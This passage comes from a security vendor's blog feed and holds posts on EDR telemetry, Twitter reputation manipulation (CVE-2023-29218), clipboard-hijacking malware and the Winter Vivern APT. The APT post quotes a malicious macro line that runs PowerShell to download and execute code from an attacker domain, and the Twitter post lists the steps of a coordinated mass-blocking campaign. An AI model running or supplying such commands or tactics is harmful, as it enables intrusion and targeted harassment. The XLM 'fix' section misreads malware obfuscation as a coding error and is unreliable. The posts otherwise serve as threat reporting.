nofollow">https://github.com/tsale/EDR-Telemetry</a></li><li><strong><strong>Comparison table:</strong></strong> <a href="https://docs.google.com/spreadsheets/d/1ZMFrD6F6tvPtf_8McC-kWrNBBec_6Si3NW6AoWf3Kbg/edit?usp=sharing" rel="noopener ugc nofollow">https://docs.google.com/spreadsheets/d/1ZMFrD6F6tvPtf_8McC-kWrNBBec_6Si3NW6AoWf3Kbg/edit?usp=sharing</a></li></ul><p></p><blockquote>In conclusion, the adoption of EDR solutions is not enough to secure organizations from cyber threats. The EDR Telemetry project provides a comprehensive comparison of EDR products' telemetry data, which is crucial in building additional detections and conducting threat hunting. Organizations need to understand that investing in EDR solutions is not enough, and they need to ensure that the EDR solution they choose provides enough telemetry data to detect sophisticated attacks.</blockquote><p>We understand the importance of having a reliable and effective cybersecurity solution to protect organization from emerging threats such as malicious software and APTs. That's why we offer our clients a strong partnership for gathering Scrutiny Engine Detection Intelligence through our EDR companion, which allows us to provide the most effective tools and strategies to enhance your security posture.</p><p>To stop advanced attacks in their early stages, it is essential to detect and respond to them as quickly as possible. Some of the major processes where advanced attacks can be stopped include identifying and blocking malicious IPs, detecting and blocking malicious files, and identifying and stopping command and control (C2) communications.</p><p>By leveraging the co-pilot phase of advanced detection, customers can significantly reduce their mean time to detect (MTTD) and mean time to respond (MTTR) to advanced threats. This can be achieved by creating custom rules and policies, as well as by integrating our threat intelligence feeds.</p><p>By working in parallel with EDR solutions, the scrutiny engine helps to reduce the workload of EDR sysops and increases the efficiency of the overall security infrastructure. The scrutiny engine also helps to protect against attacker bypass techniques, such as signature-less attacks, without collecting any data.</p><blockquote>In a recent case study, CyberStanc's scrutiny engine was able to detect a previously unknown malware variant that was designed to evade traditional signature-based detection mechanisms. </blockquote><p>Our dedicated R&amp;D center is constantly developing cutting-edge technologies to combat emerging threats, and we take pride in offering our clients the best possible service and support. In addition, our Secure-Tech service provides internal and third-party application scrutiny scans, using our convenient Pay-As-You-Go model. This means you can easily access our advanced cybersecurity services without committing to a long-term contract.</p><h2 id="at-cyberstanc-we-are-committed-to-ensuring-a-safer-and-more-secure-digital-world-for-all-">At Cyberstanc, we are committed to ensuring a safer and more secure digital world for all.</h2><p></p><h3 id="contact-us-today-at-sales-cyberstanc-com-to-learn-more-about-how-our-av-edr-companion-and-other-advanced-cybersecurity-solutions-can-protect-your-organization-from-cyber-threats-">Contact us today at <a href="mailto:Sales@cyberstanc.com">Sales@cyberstanc.com</a> to learn more about how our AV/EDR companion and other advanced cybersecurity solutions can protect your organization from cyber threats. </h3><p></p>]]></content:encoded></item><item><title><![CDATA[Twitter Algorithm: A Dangerous Weapon in the Hands of the Manipulators]]></title><description><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/tweet.png" class="kg-image" alt></figure><p></p><p>In today's digital age, social media has become an integral part of our daily lives. Among them, Twitter stands out as a platform that enables users to express their opinions, engage with others, and get informed about the latest news and events worldwide.</p><p>However, with great power comes great responsibility,</p>]]></description><link>https://cyberstanc.com/blog/twitter-algorithm-a-dangerous-weapon-in-the-hands-of-the-manipulators/</link><guid isPermaLink="false">642fed02d8f58f2412f1f4b1</guid><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Wed, 05 Apr 2023 11:42:39 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/tweet.png" class="kg-image" alt></figure><p></p><p>In today's digital age, social media has become an integral part of our daily lives. Among them, Twitter stands out as a platform that enables users to express their opinions, engage with others, and get informed about the latest news and events worldwide.</p><p>However, with great power comes great responsibility, and Twitter's algorithm is no exception. In recent years, there have been growing concerns about the misuse of the Twitter algorithm to manipulate and hurt users' accounts' reputations without any recourse. </p><p>The discovery of the CVE-2023-29218 vulnerability in Twitter's code is a reminder that online platforms are not invulnerable to cyberattacks. </p><blockquote>The response from Twitter CEO Elon Musk, offering a bounty for the conviction of those behind the botnets exploiting the vulnerability, highlights the seriousness of the situation. </blockquote><p>It is a reminder that cybersecurity is a shared responsibility and that we all have a role to play in protecting ourselves and our communities.</p><p>This article sheds light on the potential dangers of the Twitter algorithm as a manipulative tool and highlights the growing concerns about the hurt users account reputations.</p><h2 id="how-the-twitter-algorithm-can-be-exploited">How the Twitter Algorithm Can Be Exploited</h2><p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-3.png" class="kg-image" alt></figure><blockquote>Twitter's algorithm chooses tweets based on a collection of core models and features that extract latent information from tweet, user, and engagement data.</blockquote><blockquote>Twitter's timeline involves three major stages in the recommendation pipeline: candidate sourcing, machine learning algorithm ranking, and filters and heuristics usage.</blockquote><blockquote>The service in charge of creating and delivering the schedule is Home Mixer, which is the technological framework that links various potential sources, scoring formulas, heuristics, and filters.</blockquote><blockquote>The Twitter algorithm uses in-network and out-of-network sources to select the top 1500 tweets for each request from a group of hundreds of millions.</blockquote><blockquote>The embedding space methods create numerical representations of users’ interests and Tweets’ substance to respond to the more broad inquiry about content similarity.</blockquote><blockquote>The timeline’s objective is to provide pertinent Tweets by ranking them based on scoring, which serves as a direct predictor of each prospective Tweet’s relevance.</blockquote><p>The problem with the current implementation of the Twitter algorithm is that all penalties are applied at the account level, regardless of the content's nature. This means that even if the reported content is entirely legitimate, the account owner still suffers the consequences.</p><p>The process of exploiting the Twitter algorithm is quite straightforward. First, a group of users with similar views needs to be organized. They then find a target and execute the following tasks in order: follow in preparation, unfollow a few days later, report a few "borderline" posts, mute, and block. </p><blockquote>This coordinated effort results in a global penalty being applied to the target's account, significantly hurting its reputation and visibility.</blockquote><p></p><h3 id="the-vulnerabilities-in-the-twitter-algorithm">The Vulnerabilities in the Twitter Algorithm</h3><p></p><p>Twitter, one of the world's most popular social media platforms, has recently been hit with a new security vulnerability, CVE-2023-29218, which allows attackers to manipulate its recommendation algorithm using mass blocking actions from multiple bot-created accounts. </p><p>This flaw has the potential to suppress specific users from appearing in people's feeds by artificially driving down their reputation scores, causing a denial of service.</p><p>Moreover, the penalties accumulate over time and survive the actual tweet, making them even more dangerous. No matter how much the account owner tries to boost their visibility, with enough people applying enough signals, the multiplier gets incredibly low, making it impossible to reverse the damage.</p><blockquote>To make matters worse, there are apps and websites like BlockParty, Reddit's GamerGhazi, and BlockTogether that enable users to build, organize, and weaponize this behavior. BlockTogether, for instance, had 303,000 registered users, with 198,000 users subscribing to at least one list and 4.5 billion actions.</blockquote><blockquote>"The Twitter Recommendation Algorithm through ec83d01 allows attackers to cause a denial of service (reduction of reputation score) by arranging for multiple Twitter accounts to coordinate negative signals regarding a target account, such as unfollowing, muting, blocking, and reporting, as exploited in the wild in March and April 2023."</blockquote><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-2.png" class="kg-image" alt></figure><h3></h3><p>Twitter's recommendation algorithm uses machine learning to suggest content to users. The algorithm takes into account various factors such as a user's activity, who they follow, and what they interact with. It then suggests content to the user based on these factors.</p><p>The vulnerability lies in the algorithm's implementation. Twitter's algorithm takes into account negative signals such as unfollows, muting, and blocking as a factor in determining a user's reputation score. This means that if multiple accounts coordinate negative actions against a target account, it can artificially drive down the user's reputation score, resulting in the user's content being suppressed from appearing in Twitter's recommendation engine.</p><p>This vulnerability could be dangerous for users, as it can be exploited to manipulate the algorithm and artificially suppress a user's content. This could result in significant harm to the user's reputation, online presence, and potentially their career.</p><p>As a result, the user's content would be suppressed from appearing in people's feeds and the recommendation engine, ultimately harming the user's online presence and potentially leading to a loss of followers and engagement.</p><p>The vulnerability was caused by a bug in the recommendation algorithm's code, which allowed negative actions to be coordinated and amplified by botnet armies. The code was identified as ec83d01, and the flaw has since been patched by Twitter.</p><blockquote>The problem: Blocking large numbers of people on social media reduces diversity in discussion.</blockquote><h2 id="to-address-this-problem-one-possible-solution-is-to-implement-a-reputation-based-system-that-rewards-users-with-high-credibility-and-penalizes-those-with-low-credibility-">To address this problem, one possible solution is to implement a reputation-based system that rewards users with high credibility and penalizes those with low credibility.</h2><p></p><p>The algorithm could take into account various factors such as the age of the account, the frequency of posts, the number of followers, the number of likes and retweets, and the engagement rate. Users with high credibility scores would receive a boost in their posts' visibility, while users with low credibility scores would experience a downgrade.</p><p>To further discourage the creation of fake accounts, the algorithm could also impose a penalty on accounts that are suspected of being fake or engaging in malicious activities. </p><p>For instance, accounts that are reported by multiple users or flagged by automated systems could receive a temporary ban or a permanent suspension.</p><p>Here's an example of how the algorithm could work:</p><ul><li>User A has an account that is one year old, has 5,000 followers, and averages 100 likes and 50 retweets per post. User A's engagement rate is calculated as (100+50)/(5,000)=0.03, and the credibility score is assigned as 80 out of 100.</li><li>User B has an account that is one month old, has 100 followers, and averages 1 like and 0 retweets per post. User B's engagement rate is calculated as (1+0)/(100)=0.01, and the credibility score is assigned as 20 out of 100.</li><li>User C has an account that is suspected of being fake, has 10,000 followers, and averages 1,000 likes and 500 retweets per post. User C's engagement rate is calculated as (1,000+500)/(10,000)=0.15, but the credibility score is penalized as 30 out of 100 due to suspicious activity.</li></ul><blockquote>In this example, User A would receive a small boost in their posts' visibility, User B would receive a significant downgrade, and User C would receive a severe penalty. This algorithm could incentivize users to create authentic and credible accounts and discourage malicious behavior on Twitter.</blockquote><p></p><p></p><h2 id="twitter-takes-control-of-its-platform-with-new-house-keeping-initiatives">Twitter Takes Control of Its Platform with New House-Keeping Initiatives</h2><p></p><p>As a leading social media platform, Twitter has a responsibility to protect its users from abuse, harassment, and manipulation. The company must take proactive steps to address the vulnerabilities in its algorithm and ensure that it cannot be exploited to hurt users' accounts' reputations. </p><p>This includes implementing measures to prevent coordinated attacks, improving the transparency of the algorithm, and providing users with more control over their accounts' visibility.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/04/image-4.png" class="kg-image" alt></figure><p></p><blockquote>Twitter is not the only tech giant that has faced criticism for its algorithmic practices. Algorithmic bias has been a hot topic in recent years, with many calling for greater transparency and accountability in the algorithms used by tech companies.</blockquote><blockquote>Google has also faced criticism for its algorithmic practices. In 2020, a study found that Google's search algorithm prioritized its own products and services over those of its competitors. This led to an antitrust lawsuit being filed against Google by the U.S. Department of Justice.</blockquote><blockquote>Similarly, Facebook has faced criticism for its algorithmic practices. The company has been accused of amplifying extremist content and allowing false information to spread. In response, Facebook has made changes to its algorithm to prioritize content from reputable sources.</blockquote><p>Conclusion</p><p>In conclusion, the Twitter algorithm can be a powerful tool for users to engage with others, express their opinions, and get informed about the latest news and events. However, it can also be a dangerous weapon in the hands of manipulators who seek to hurt, silence, or undermine other users' accounts.</p><blockquote>"<a href="https://github.com/twitter/the-algorithm">https://github.com/twitter/the-algorithm</a>"</blockquote><p>If you're interested in learning more about the technical aspects of these solutions or need assistance with cybersecurity practices, be sure to reach out to the experts at Cyberstanc. Our team of professionals can provide you with the latest information and best practices for online safety and security. You can contact at <a href="mailto:training@cyberstanc.com">training@cyberstanc.com</a> for more information.</p><p>Together, we can make social media a safer and more productive space for everyone. Let's continue to work towards a brighter and more secure digital future.</p>]]></content:encoded></item><item><title><![CDATA[Protect Your Sensitive Data: Examining the Risks and Dangers of Clipboard Hijacking in Copy-Paste Scams]]></title><description><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/cp1-1.png" class="kg-image" alt></figure><p></p><h3 id="the-emergence-of-clipboard-injection-attacks-">The Emergence of Clipboard Injection Attacks: </h3><h3 id="clipboard-injection-attacks-have-emerged-as-a-threat-to-cryptocurrency-and-banking-users-this-technique-which-is-more-than-a-decade-old-relies-on-malware-replacing-part-of-the-clipboard-contents-once-it-detects-a-wallet-address-in-it-">Clipboard injection attacks have emerged as a threat to cryptocurrency and banking users. This technique, which is more than a decade old, relies on malware replacing part of the clipboard contents once it detects a wallet address in it.</h3><p></p><p>Despite the attack being fundamentally</p>]]></description><link>https://cyberstanc.com/blog/examining-the-risks-and-dangers-of-clipboard-hijacking-protecting-your-sensitive-data/</link><guid isPermaLink="false">6425ac2ec4dea6ebec8aeabf</guid><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Thu, 30 Mar 2023 09:37:22 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/cp1-1.png" class="kg-image" alt></figure><p></p><h3 id="the-emergence-of-clipboard-injection-attacks-">The Emergence of Clipboard Injection Attacks: </h3><h3 id="clipboard-injection-attacks-have-emerged-as-a-threat-to-cryptocurrency-and-banking-users-this-technique-which-is-more-than-a-decade-old-relies-on-malware-replacing-part-of-the-clipboard-contents-once-it-detects-a-wallet-address-in-it-">Clipboard injection attacks have emerged as a threat to cryptocurrency and banking users. This technique, which is more than a decade old, relies on malware replacing part of the clipboard contents once it detects a wallet address in it.</h3><p></p><p>Despite the attack being fundamentally simple, it harbors more danger than would seem. This blog post will delve into clipboard injection attacks, including their nature of work, malware execution, and how Scrutiny engine can detect all attacks at an early stage with reliability.</p><blockquote>Clipboard injection attacks are not new, as they started with banking trojans that targeted specific banks in 2013 by replacing bank account numbers in the clipboard. </blockquote><blockquote>The use of regular expressions is a common technique used by malware developers to scan through large amounts of data and find specific patterns. In this case, the malware is scanning for wallet IDs, which are used to transfer funds from one account to another.</blockquote><h3 id="how-clipboard-injection-attacks-work-">How Clipboard Injection Attacks Work:</h3><p>The attack works by inserting malware into the victim's device, which then monitors the clipboard for specific data, such as cryptocurrency wallet addresses, bank account numbers, or login credentials.</p><p>Once the malware detects the desired information in the clipboard, it replaces it with fraudulent data, redirecting the victim's funds to the attacker's account. This tactic has been widely used by hackers to carry out various types of scams, including cryptocurrency theft, identity theft, and financial fraud.</p><blockquote>Malware installed with Enigma packer v4.0</blockquote><blockquote>Malware integrates into Windows clipboard viewers</blockquote><blockquote>Malware scans clipboard for regular expressions</blockquote><blockquote>If match found, replace with random address</blockquote><blockquote>Hardcoded list of thousands of replacement addresses.</blockquote><p>Since then, hackers have found various ways to exploit the copy-paste function for stealing sensitive data. US bank account numbers, IBANs, SWIFT/BIC codes, credit card numbers, social security numbers, Canadian social insurance numbers, UK national insurance numbers, and even PayPal account emails are all at risk.</p><blockquote>US bank account number: \b\d{9}\b</blockquote><blockquote>IBAN (International Bank Account Number): \b[A-Z]{2}\d{2}[A-Z]{4}\d{7}([A-Z\d]?){0,16}\b</blockquote><blockquote>SWIFT/BIC code: \b[A-Z]{6}[A-Z\d]{2}([A-Z\d]{3})?\b</blockquote><blockquote>Credit card number: \b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b</blockquote><blockquote>Social Security number (US): \b\d{3}[- ]?\d{2}[- ]?\d{4}\b</blockquote><blockquote>Canadian Social Insurance Number: \b\d{3}[- ]?\d{3}[- ]?\d{3}\b</blockquote><blockquote>UK National Insurance Number: \b[A-Z]{2}\d{6}[A-Z]?\b</blockquote><blockquote>PayPal account email: \b[A-Za-z\d._%+-]+@[A-Za-z\d.-]+.[A-Za-z]{2,}\b</blockquote><p></p><p>Adding increased value of cryptocurrencies made it a very lucrative target. This is where the first clipboard attacks on cryptocurrency owners began to emerge. Hackers would replace the wallet addresses in the clipboard with their own, resulting in the victim transferring their cryptocurrency into the attacker's wallet.</p><blockquote>(^|\s)1[1-9A-HJ-NP-Za-km-z]{25,34}($|\s) – Bitcoin (P2PKH)</blockquote><blockquote>(^|\s)3[1-9A-HJ-NP-Za-km-z]{25,34}($|\s) – Bitcoin (P2SH)</blockquote><blockquote>(^|\s)bcrt1[ac-hj-np-z02-9]{7,71}($|\s) – Bitcoin (Bech32)</blockquote><blockquote>(^|\s)X[1-9A-HJ-NP-Za-km-z]{24,34}($|\s) – Ripple</blockquote><blockquote>(^|\s)0x([A-Fa-f0-9]{40})\b – Ethereum</blockquote><blockquote>(^|\s)[TM]{1}[a-zA-Z0-9]{33}($|\s) – Tether</blockquote><blockquote>(^|\s)N[1-9A-HJ-NP-Za-km-z]{32,33}($|\s) – NEM</blockquote><blockquote>(^|\s)bnb[1-9A-HJ-NP-Za-km-z]{38}($|\s) – Binance Coin</blockquote><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/att.png" class="kg-image" alt></figure><p>Once the malware identifies a cryptocurrency wallet address, it replaces it with an address that is controlled by the attacker. The replacement address is typically a different cryptocurrency wallet that belongs to the attacker. When the user pastes the wallet address into a cryptocurrency transfer, the transaction is sent to the attacker's wallet instead of the intended recipient.</p><p>The hexdump of the malware data reveals the use of regular expressions and replacement wallet IDs to hide the malicious code's true purpose. </p><blockquote>This technique is effective because it does not require the malware to actively communicate with a remote server. It operates entirely within the user's system and relies on the user to perform an action, such as pasting a wallet address into a cryptocurrency transfer. As a result, this technique is difficult to detect by traditional security measures.</blockquote><h3></h3><h3 id="detecting-clipboard-injection-attacks-">Detecting Clipboard Injection Attacks:</h3><p>Clipboard injection attacks are a sophisticated form of malware that are difficult to detect using traditional security measures. However, through the use of advanced threat intelligence and simulation intelligence, detecting these attacks is possible.</p><blockquote>Threat intelligence involves the collection and analysis of data on emerging threats to identify patterns and behaviors that indicate clipboard injection attacks. This includes analyzing data on malware campaigns, tracking the activities of threat actors, and monitoring vulnerabilities in software and systems.</blockquote><blockquote>Simulation intelligence, on the other hand, involves the creation of simulated attack scenarios to test the effectiveness of security measures in detecting and preventing clipboard injection attacks.</blockquote><p>Together, these techniques provide a powerful defense against clipboard injection attacks. By staying vigilant and leveraging advanced threat intelligence and simulation intelligence, security teams can detect these attacks early and prevent significant damage to their systems and data.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-14.png" class="kg-image" alt></figure><p>"<a href="https://polyswarm.network/scan/results/file/13d9399c999232ee4fc8b666b68e37ce277d8186c3a25448a5d146c1b7100a8a">https://polyswarm.network/scan/results/file/13d9399c999232ee4fc8b666b68e37ce277d8186c3a25448a5d146c1b7100a8a</a>"</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-15.png" class="kg-image" alt></figure><p>"<a href="https://polyswarm.network/scan/results/file/b12de973c65c13c17ec5388f200c1141aa2dbd209bd980399bbefae2d35082dc">https://polyswarm.network/scan/results/file/b12de973c65c13c17ec5388f200c1141aa2dbd209bd980399bbefae2d35082dc</a>"</p><h3></h3><h3 id="enigma-packer-a-cryptographic-tool-for-malware-protection-and-obfuscation">Enigma Packer: A Cryptographic Tool for Malware Protection and Obfuscation</h3><p><br>Clipboard injection attacks can also be connected to the Enigma packer, a cryptographic tool commonly used by malware developers. By using clipboard injection attacks in combination with the Enigma packer, cybercriminals can further protect their malicious activities and make it even harder for security software to detect and prevent their attacks.</p><blockquote>The Enigma packer employs various cryptography functions, such as AES and RSA, to encrypt the malware code and make it harder to analyze or detect. </blockquote><blockquote>The Enigma packer is often sold on underground forums and is popular among malware coders and cybercriminals. It is commonly used in Advanced Persistent Threats (APTs), which are long-term, targeted attacks aimed at stealing sensitive information or disrupting critical infrastructure.</blockquote><p></p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-16.png" class="kg-image" alt></figure><p>"<a href="https://polyswarm.network/scan/results/file/870d5329623782504b91d4b52b1b7905730f28b4cf62873de444921510f1f679">https://polyswarm.network/scan/results/file/870d5329623782504b91d4b52b1b7905730f28b4cf62873de444921510f1f679</a>"</p><h3 id="the-danger-of-clipboard-injection-attacks-">The Danger of Clipboard Injection Attacks:</h3><p></p><p>Clipboard injection attacks are a type of malware that can remain undetected for long periods of time, posing a significant risk to users' sensitive data. Unlike other malware that is typically discovered through obvious signs of activity or associations with known bad infrastructure, clipboard injectors only activate when certain conditions are met, such as the presence of specific data in the clipboard.</p><blockquote>This makes them particularly dangerous, as they can quietly sit on a system for years, waiting for the right opportunity to strike. To protect against clipboard injection attacks, it's essential to use a combination of techniques, including monitoring system activity, using anti-malware software, and employing cryptography to protect sensitive data.</blockquote><blockquote>Cryptography functions such as hashing and encryption can be especially effective in protecting against these attacks. By encrypting or hashing sensitive data like wallet IDs, it becomes much more difficult for attackers to read or manipulate the information.</blockquote><blockquote>One way to mitigate this type of malware is to verify the accuracy of the wallet address before sending any cryptocurrency. Users can double-check the wallet address by comparing it to a trusted source or using a hardware wallet that displays the address on its screen. </blockquote><blockquote>Additionally, implementing two-factor authentication (2FA) can provide an additional layer of security, making it more difficult for attackers to gain access to cryptocurrency wallets.</blockquote><p>At Cyberstanc, we understand the risks posed by clipboard injection attacks and can help you protect your sensitive data. Contact us today at <a href="mailto:sales@cyberstanc.com">sales@cyberstanc.com</a> to learn more about our cybersecurity solutions.</p>]]></content:encoded></item><item><title><![CDATA[Unmasking Winter Vivren: A Dangerous APT group Motivated by Politics]]></title><description><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/modiAPT-1.png" class="kg-image" alt></figure><p></p><p>Winter Vivren APT Group is a politically motivated cyber threat APT that has been active since at least December 2020. The group has remained out of the public eye since its inception, but it resurfaced in recent months with campaigns against government agencies and individuals in Italy, India, Poland, and</p>]]></description><link>https://cyberstanc.com/blog/unmasking-winter-viviren-a-scrappy-but-dangerous-cyber-threat-with-political-motivations/</link><guid isPermaLink="false">64188f1e20141ce53c58ad9e</guid><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Tue, 21 Mar 2023 05:06:48 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/modiAPT-1.png" class="kg-image" alt></figure><p></p><p>Winter Vivren APT Group is a politically motivated cyber threat APT that has been active since at least December 2020. The group has remained out of the public eye since its inception, but it resurfaced in recent months with campaigns against government agencies and individuals in Italy, India, Poland, and Ukraine.</p><blockquote>Winter Vivren is also known as UAC-0114 and is classified as an advanced persistent threat (APT).</blockquote><p>Winter Vivren primarily targets governmental organizations and its TTP involves seeking initial access primarily through phishing lures, document exploits, fake removable (USB) devices, DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection. </p><p>The group has remained out of the public eye for many years, until the recent attacks against Ukrainian and Polish government targets inspired reports on resurgent activity earlier this year from the Central Cybercrime Bureau of Poland and the State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine.</p><blockquote>The Winter Vivren story is scattered and leads to a somewhat confused profile!</blockquote><h3 id="winter-vivern-s-targeting-of-indian-government-sites">Winter Vivern's Targeting of Indian Government Sites </h3><p>Winter Vivern targeted individual members of the Indian government in their recent campaign. The group's phishing emails impersonated government officials and organizations, including the Ministry of Home Affairs, to trick victims into clicking on a malicious link. The link led to a fake login page that prompted the user to enter their credentials.</p><blockquote>The group registered multiple domains that resembled legitimate government websites, such as "<a href="https://www.mha.gov.in/">https://www.mha.gov.in/</a>," which was used in their campaign. Winter Vivern created multiple phishing sites that were used in their attack, including "<a href="https://mha-gov.in/">https://mha-gov.in/</a>," "<a href="https://mha-home-affairs.in/">https://mha-home-affairs.in/</a>," and "<a href="https://mha-nic.in/">https://mha-nic.in/</a>." These phishing sites were designed to look like the legitimate Ministry of Home Affairs website, complete with the official logo and other visual elements.</blockquote><p>Once the victim entered their credentials into the fake login page, Winter Vivern harvested the information and used it to gain access to the victim's email account. The group then used the compromised email accounts to send phishing emails to other targets within the organization, further expanding their access.</p><p>Victims who download the fake software from the fake government domain will see what appears to be an actual antivirus running, when, in fact, a malicious payload is being downloaded in the background. </p><p></p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-2.png" class="kg-image" alt></figure><p></p><h3 id="the-group-has-also-been-known-to-use-macros-in-microsoft-excel-files-and-relies-on-shared-toolkits-and-the-abuse-of-legitimate-windows-tools-to-compromise-organizations-beyond-the-theft-of-legitimate-credentials-">The group has also been known to use macros in Microsoft Excel files and relies on shared toolkits and the abuse of legitimate Windows tools to compromise organizations beyond the theft of legitimate credentials.</h3><p></p><blockquote>XLM macros are made up of functions, arguments, and operators. The error message we are discussing indicates a problem with an operator. Specifically, the "CMPOP" operator, which is used to compare two values.</blockquote><blockquote>Issue: The error message "Unexpected token Token('CMPOP', '=')" occurs when Excel encounters an unexpected operator in an XLM macro. In this case, the unexpected operator is the equals sign (=).</blockquote><blockquote>The error message also indicates that the error occurred at line 1, column 221, and that Excel was expecting the end of the XLM macro ($END) instead of the equals sign.</blockquote><blockquote>The XLM macro causing this error includes a long string of padding, which appears to be an attempt to obfuscate the macro. The padding includes multiple occurrences of the "=RAND()=SUMPRODUCT(54623,42,452,452,452)" expression, which generates a random number and multiplies it by a set of constants.</blockquote><blockquote>Solution: The simplest solution to this error is to remove the padding from the XLM macro. This can be done by searching for the padding string "= ""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""&amp;""=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)", and replacing it with an empty string.</blockquote><blockquote>In addition, it is recommended to avoid the use of obfuscation techniques in XLM macros, as they can make it difficult to understand and maintain the code. Instead, XLM macros should be well-documented and written in a clear and concise manner.</blockquote><blockquote>The error message "Unexpected token Token('CMPOP', '=')" indicates a problem with an operator in an XLM macro in Excel. Specifically, the equals sign (=) is being used in an unexpected way. The error can be resolved by removing the padding from the XLM macro and avoiding the use of obfuscation techniques. It is important to write XLM macros in a clear and concise</blockquote><p>Winter Vivern disguises its malware as antivirus software, pitching the fake scanners through email to targets as government notices. These notices instruct recipients to scan their machines with this supposed antivirus software. Victims who download the fake software from the fake government domain will see what appears to be an actual antivirus running, when, in fact, a malicious payload is being downloaded in the background.</p><p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/CS.png" class="kg-image" alt></figure><p>Winter Vivern's primary payload in recent months has been Aperitif, a Trojan that collects details about victims, establishes persistence on a target machine, and beacons out to an attacker-controlled command-and-control server (C2). The group also resorts to old favorites such as macro-enabled Microsoft Excel files. When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits and the abuse of legitimate Windows tools.</p><blockquote>CALL("kernel32","WinExec","JCJ","powershell  -c ""iex (New-Object Net.Webclient).DownloadString( 'https://secure-daddy[.]com/wintervivern/server/serverHttpRequest(RUN).txt')""",0) <br></blockquote><p>Winter Vivern's tactics and techniques have allowed them to remain under the radar, despite their recent targeting of government agencies and individuals. The group's resourcefulness and ability to accomplish a lot with potentially limited resources make them a formidable threat, even though they lack the resources of other Russian-speaking APT groups. </p><blockquote> It remains to be seen if Winter Vivern will continue to fly under the radar or if they will become a more significant threat in the future.</blockquote><p></p>]]></content:encoded></item><item><title><![CDATA[Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm]]></title><description><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2020/11/Screenshot-2020-10-20-at-5.04.51-PM-1.png" class="kg-image" alt></figure><p></p><h3 id="welcome-to-the-future-of-cybersecurity-">Welcome to the future of cybersecurity!</h3><p>Cyberstanc is excited to announce our partnership with <strong>Polyswarm</strong>, a pioneering force in fully crowd-sourced malware detection. Together, we are on a mission to revolutionize the cybersecurity landscape.</p><p>At Cyberstanc, we prioritize continuous innovation to tackle the latest challenges in the field. Collaborating with</p>]]></description><link>https://cyberstanc.com/blog/cyberstanc-partners-with-polyswarm/</link><guid isPermaLink="false">5f9d0dd3879ca3a68a16cdf0</guid><category><![CDATA[Scrutiny]]></category><category><![CDATA[swatbox]]></category><category><![CDATA[malware]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Mon, 20 Mar 2023 16:25:00 GMT</pubDate><media:content url="https://cyberstanc.com/blog/content/images/2020/11/collab.png" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2020/11/Screenshot-2020-10-20-at-5.04.51-PM-1.png" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"></figure><img src="https://cyberstanc.com/blog/content/images/2020/11/collab.png" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"><p></p><h3 id="welcome-to-the-future-of-cybersecurity-">Welcome to the future of cybersecurity!</h3><p>Cyberstanc is excited to announce our partnership with <strong>Polyswarm</strong>, a pioneering force in fully crowd-sourced malware detection. Together, we are on a mission to revolutionize the cybersecurity landscape.</p><p>At Cyberstanc, we prioritize continuous innovation to tackle the latest challenges in the field. Collaborating with Polyswarm, we aim to establish a benchmark cybersecurity posture that enhances protection for the entire community. This partnership reflects our commitment to advancing the industry and ensuring robust defenses against evolving threats.</p><h3 id="oct-29-2020"><u>Oct 29, 2020</u></h3><blockquote><a href="https://blog.polyswarm.io/cyberstanc-joins-the-polyswarm-threat-intelligence-marketplace">“We welcome Cyberstanc as a new participant in PolySwarm’s marketplace. We strive to bring specialized 